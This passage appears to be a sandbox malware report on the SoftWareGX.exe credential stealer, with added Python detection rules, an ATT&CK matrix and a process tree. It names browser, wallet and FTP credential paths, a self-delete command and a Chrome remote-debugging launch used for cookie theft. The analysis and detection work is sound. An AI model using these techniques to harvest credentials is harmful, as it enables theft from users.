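The three signature groups above line up into one detection story: under HIPS / PFW / Operating System Protection Evasion, SoftWareGX.exe runs csc.exe against a response file in %TEMP%, starts MSBuild.exe with no project argument, writes a PE into it starting at base 400000, and the hollowed MSBuild.exe later spawns cmd.exe with "timeout /t 10 & rd /s /q"; under Stealing of Sensitive Information that same MSBuild.exe opens Chrome/Edge Login Data, Firefox key4.db and the wallet directories; under Remote Access Functionality it launches chrome.exe with --remote-debugging-port=9223, which is how a stealer reads cookies through DevTools without decrypting the profile itself. The following is an added example, not Joe Sandbox code: a small rule set run over process-creation and file-open events that are constructed here from the report's lines (PIDs, the parent PIDs, and the benign control events are invented for the example).

```python
"""Detection rules for the process chain and credential-store access listed in this report.
Added example (not Joe Sandbox code); the events below are constructed from the report's
"Process created" and "File opened" lines, with invented PIDs and benign control events."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str


@dataclass(frozen=True)
class FileEvent:
    pid: int        # process that performed the open
    path: str


BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "firefox.exe"}
# csc.exe/vbc.exe reading a response file from a user-writable temp location
TEMP_RSP = re.compile(r'@"?[^"\s]*\\(?:AppData\\Local\\Temp|Windows\\Temp|ProgramData)\\', re.I)
# a real build passes a project, solution or response file to MSBuild
PROJECT_ARG = re.compile(r'\.(?:csproj|vbproj|proj|sln|targets|rsp)\b', re.I)
# "timeout /t N & rd /s /q <dir>" (or "del /f|/q"): delayed removal of a staging directory
SELF_DELETE = re.compile(r'timeout\s+/t\s+\d+.*?(?:rd|rmdir)\s+/s\s+/q|\bdel\s+/[fq]', re.I | re.S)
# browser credential stores and wallet locations named in the report's "File opened" lines
CRED_STORE = re.compile(
    r'\\(?:Login Data|Web Data|key4\.db|logins\.json|cookies\.sqlite)$'
    r'|\\(?:Bitcoin|Electrum(?:-LTC)?|ElectronCash|Coinomi\\Coinomi)\\wallets(?:\\|$)'
    r'|\\Exodus\\exodus\.wallet(?:\\|$)|\\Ledger Live(?:\\|$)|\\FileZilla\\recentservers\.xml$',
    re.I)
Hit = Tuple[str, int]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def args_after_image(cmdline: str) -> str:
    """Drop the leading (optionally quoted) image token and return the argument string."""
    m = re.match(r'\s*(?:"[^"]*"|\S+)\s*(.*)$', cmdline, re.S)
    return m.group(1) if m else ""


def detect_process_events(events: Iterable[ProcEvent]) -> List[Hit]:
    events = list(events)
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    hits: List[Hit] = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        args = args_after_image(e.cmdline)
        if name in ("csc.exe", "vbc.exe") and TEMP_RSP.search(args):
            hits.append(("csc_compile_from_temp", e.pid))
        if name == "msbuild.exe" and not PROJECT_ARG.search(args):
            hits.append(("msbuild_without_project", e.pid))   # hollowed host, nothing to build
        if name == "cmd.exe" and SELF_DELETE.search(args):
            hits.append(("delayed_self_delete", e.pid))
        if name in BROWSERS and "--remote-debugging-" in args and pname not in BROWSERS:
            hits.append(("browser_remote_debugging_foreign_parent", e.pid))
    return hits


def detect_credential_access(events: Iterable[ProcEvent], files: Iterable[FileEvent]) -> List[Hit]:
    """Flag a process that is not a browser opening a browser, FTP-client or wallet secret store."""
    by_pid = {e.pid: e for e in events}
    hits: List[Hit] = []
    for f in files:
        owner = by_pid.get(f.pid)
        name = basename(owner.image) if owner else ""
        if name not in BROWSERS and CRED_STORE.search(f.path):
            hits.append(("foreign_process_reads_credential_store", f.pid))
    return hits


# Constructed events: PIDs 100-104 mirror the sample's chain, 200-300 are benign controls.
SAMPLE_PROCS = [
    ProcEvent(100, 1, r"C:\Users\user\Desktop\SoftWareGX.exe", r'"C:\Users\user\Desktop\SoftWareGX.exe"'),
    ProcEvent(101, 100, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths '
              r'@"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline"'),
    ProcEvent(102, 100, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"'),
    ProcEvent(103, 102, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\xl6pp" & exit'),
    ProcEvent(104, 102, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 '
              r'--profile-directory="Default"'),
    ProcEvent(200, 50, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
              r'csc.exe /noconfig @"C:\src\app\obj\Debug\app.csc.rsp"'),
    ProcEvent(201, 50, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
              r'MSBuild.exe C:\src\app\app.csproj /t:Build'),
    ProcEvent(300, 1, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'),
]
SAMPLE_FILES = [
    FileEvent(102, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    FileEvent(102, r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.db"),
    FileEvent(102, r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet"),
    FileEvent(102, r"C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml"),
    FileEvent(300, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),  # Chrome itself
]

if __name__ == "__main__":
    for rule, pid in detect_process_events(SAMPLE_PROCS) + detect_credential_access(SAMPLE_PROCS, SAMPLE_FILES):
        print(f"{rule:45s} pid={pid}")
```

On the constructed input the four process rules fire once each on PIDs 101 to 104 and the credential rule fires four times on the MSBuild.exe PID, while the developer build (200, 201) and Chrome reading its own Login Data (300) stay quiet. The MSBuild rule is the one to tune in production: it deliberately ignores the parent, because here the parent is an unsigned desktop executable, but build agents do start MSBuild.exe without a project file in rare cases, so scope it to non-developer hosts or require the cmd.exe self-delete child as a second signal.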
MITRE ATT&CK Matrix (per tactic; a leading number is the signature-hit count the report shows beside that technique, entries without one are the matrix's default placeholders and were not flagged)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 1 DLL Side-Loading; 1 Create Account; 1 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 DLL Side-Loading; 1 Extra Window Memory Injection; 411 Process Injection; 1 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 1 Disable or Modify Tools; 11 Obfuscated Files or Information; 1 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 Extra Window Memory Injection; 1 Masquerading; 31 Virtualization/Sandbox Evasion; 411 Process Injection; Dynamic API Resolution
Credential Access: 2 OS Credential Dumping; 1 Credentials in Registry; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 1 System Time Discovery; 1 Account Discovery; 3 File and Directory Discovery; 34 System Information Discovery; 1 Query Registry; 11 Security Software Discovery; 31 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 11 Archive Collected Data; 4 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 14 Ingress Tool Transfer; 21 Encrypted Channel; 1 Remote Access Software; 4 Non-Application Layer Protocol; 115 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph (ID: 1603227; Sample: SoftWareGX.exe; Start date: 30/01/2025; Architecture: WINDOWS; Score: 100)

The graph was exported as a single run of text. It is rebuilt below as a process tree using the graph's own node numbers. For each node: network endpoints (IP, ports, ASN, country, as extracted), dropped files, triggered signatures, and child processes. Truncated paths are kept as they appear in the report.

Start (node 2)
  Network: huloar.live; www.dropbox.com; 3 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures
  Started: SoftWareGX.exe (node 9); msedge.exe (node 14)

SoftWareGX.exe (node 9)
  Network: 147.45.44.42, ports 49706, 80, FREE-NET-ASFREEnetEU, Russian Federation
  Dropped: C:\Users\user\AppData\Local\...\yomkssf4.0.cs (Unicode); C:\Users\user\AppData\...\m3uz1vzd.cmdline (Unicode); C:\Users\user\AppData\Local\...\m3uz1vzd.0.cs (Unicode)
  Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Compiles code to access protected / encrypted code; 2 other signatures
  Started: MSBuild.exe (node 16); MSBuild.exe (node 20); csc.exe (node 22); 2 other processes (node 33)

msedge.exe (node 14)
  Dropped: C:\Users\user\AppData\Local\...\History (SQLite)
  Started: msedge.exe (nodes 25, 27, 29, 31)

MSBuild.exe (node 16)
  Network: huloar.live 116.202.5.153, ports 443, 49708, 49709, HETZNER-ASDE, Germany; t.me 149.154.167.99, ports 443, 49707, TELEGRAMRU, United Kingdom; 2 other IPs or domains
  Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal ftp login credentials; 3 other signatures
  Started: msedge.exe (node 35); chrome.exe (node 38); cmd.exe (node 41)

MSBuild.exe (node 20)
  Signatures: Attempt to bypass Chrome Application-Bound Encryption; Creates HTML files with .exe extension (expired dropper behavior)

csc.exe (node 22)
  Dropped: C:\Users\user\AppData\Local\...\yomkssf4.dll (PE32)
  Started: conhost.exe (node 43); cvtres.exe (node 45)

msedge.exe (node 25)
  Network: 23.51.89.40, ports 443, 50200, VODAFONE-AS-APVodafoneAustraliaPtyLtdAU, United States; 23.51.56.9, ports 443, 50248, TMNET-AS-APTMNetInternetServiceProviderMY, United States; 51 other IPs or domains

2 other processes (node 33)
  Dropped: C:\Users\user\AppData\Local\...\m3uz1vzd.dll (PE32)
  Started: conhost.exe (node 47); cvtres.exe (node 49)

msedge.exe (node 35)
  Signatures: Monitors registry run keys for changes
  Started: msedge.exe (node 51)

chrome.exe (node 38)
  Network: 192.168.2.16, ports 138, 443, 49706, unknown, unknown; 239.255.255.250, unknown, Reserved
  Started: chrome.exe (node 53)

cmd.exe (node 41)
  Started: conhost.exe (node 56); timeout.exe (node 58)

chrome.exe (node 53)
  Network: plus.l.google.com 172.217.16.142, ports 443, 49728, GOOGLEUS, United States; play.google.com 172.217.23.110, ports 443, 49733, GOOGLEUS, United States; 2 other IPs or domains
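The chain in the graph above is a recognisable pattern: a user-land executable writes .cs source and a .cmdline response file under AppData, launches csc.exe (with cvtres.exe as its child) to compile them, and then starts MSBuild.exe, which is the process that goes on to contact huloar.live and t.me and run the credential-theft signatures. The following detector is an added example, not part of the Joe Sandbox report and not Joe Sandbox code. It runs over constructed, Sysmon-event-1-like process records (the field names, pids, paths and the allow-list of legitimate build parents are all assumptions) and raises one alert for the suspicious csc.exe, one for the MSBuild.exe that has no project file and an unexpected parent, and a third when both share a parent.

```python
"""Detect the compile-then-MSBuild chain seen in the behavior graph.

Added example; constructed events, not telemetry from the report.
"""
import re
from dataclasses import dataclass

# A response file under the user's AppData\Local tree (assumed user-writable).
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\local\\", re.IGNORECASE)
# csc.exe is normally driven by an @response.cmdline argument.
RESPONSE_FILE = re.compile(r'@"?([^"\s]+\.cmdline)"?', re.IGNORECASE)
# MSBuild started for a real build names a project or solution.
PROJECT_FILE = re.compile(r"\.(sln|csproj|vbproj|proj|targets)\b", re.IGNORECASE)

# Parents that routinely spawn the .NET compiler or MSBuild (assumed allow-list;
# tune per environment: PowerShell Add-Type produces the same csc/cvtres pair).
BUILD_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe", "vbcscompiler.exe"}


@dataclass(frozen=True)
class Proc:
    pid: int
    image: str      # file name only, e.g. "csc.exe"
    cmdline: str
    ppid: int


@dataclass(frozen=True)
class Alert:
    rule: str
    pid: int
    detail: str


def detect(events):
    """Return alerts for csc.exe/MSBuild.exe launched outside a build tool."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e.ppid)
        pname = parent.image.lower() if parent else ""
        name = e.image.lower()
        if name == "csc.exe":
            m = RESPONSE_FILE.search(e.cmdline)
            if m and USER_WRITABLE.search(m.group(1)) and pname not in BUILD_PARENTS:
                alerts.append(Alert("csc_user_writable_response_file", e.pid,
                                    f"parent={pname} response_file={m.group(1)}"))
        elif name == "msbuild.exe":
            if pname not in BUILD_PARENTS and not PROJECT_FILE.search(e.cmdline):
                alerts.append(Alert("msbuild_no_project_unexpected_parent", e.pid,
                                    f"parent={pname}"))
    # Correlate: the same parent spawning both is the compile-then-inject chain.
    rules_by_parent = {}
    for a in alerts:
        rules_by_parent.setdefault(by_pid[a.pid].ppid, set()).add(a.rule)
    for ppid, rules in rules_by_parent.items():
        if len(rules) == 2 and ppid in by_pid:
            alerts.append(Alert("compile_then_msbuild_chain", ppid,
                                f"{by_pid[ppid].image} spawned csc.exe and MSBuild.exe"))
    return alerts


# Constructed sample: the malicious chain plus a benign Visual Studio build.
SAMPLE_EVENTS = [
    Proc(4, "explorer.exe", "explorer.exe", 1),
    Proc(9, "SoftWareGX.exe", r'"C:\Users\user\Desktop\SoftWareGX.exe"', 4),
    Proc(22, "csc.exe",
         r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths '
         r'@"C:\Users\user\AppData\Local\Temp\ab12cd34.cmdline"', 9),
    Proc(45, "cvtres.exe",
         r'cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1.res"', 22),
    Proc(16, "MSBuild.exe", r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"', 9),
    Proc(100, "devenv.exe", r'"C:\Program Files\Microsoft Visual Studio\devenv.exe"', 4),
    Proc(101, "MSBuild.exe", r'MSBuild.exe "C:\src\app\app.sln" /t:Build', 100),
    Proc(102, "csc.exe", r'csc.exe /noconfig @"C:\src\app\obj\Debug\app.csproj.cmdline"', 101),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert.rule}: pid={alert.pid} {alert.detail}")
```

The benign build (devenv.exe running MSBuild.exe on a .sln, which in turn runs csc.exe on a response file under obj\) produces no alert; only the three pids of the dropper chain fire. The parent allow-list is the part to tune first: interactive PowerShell Add-Type and some installers compile through csc.exe in exactly the same way, so in a real pipeline the csc rule alone is a medium-confidence signal and the correlated chain is the high-confidence one.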

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.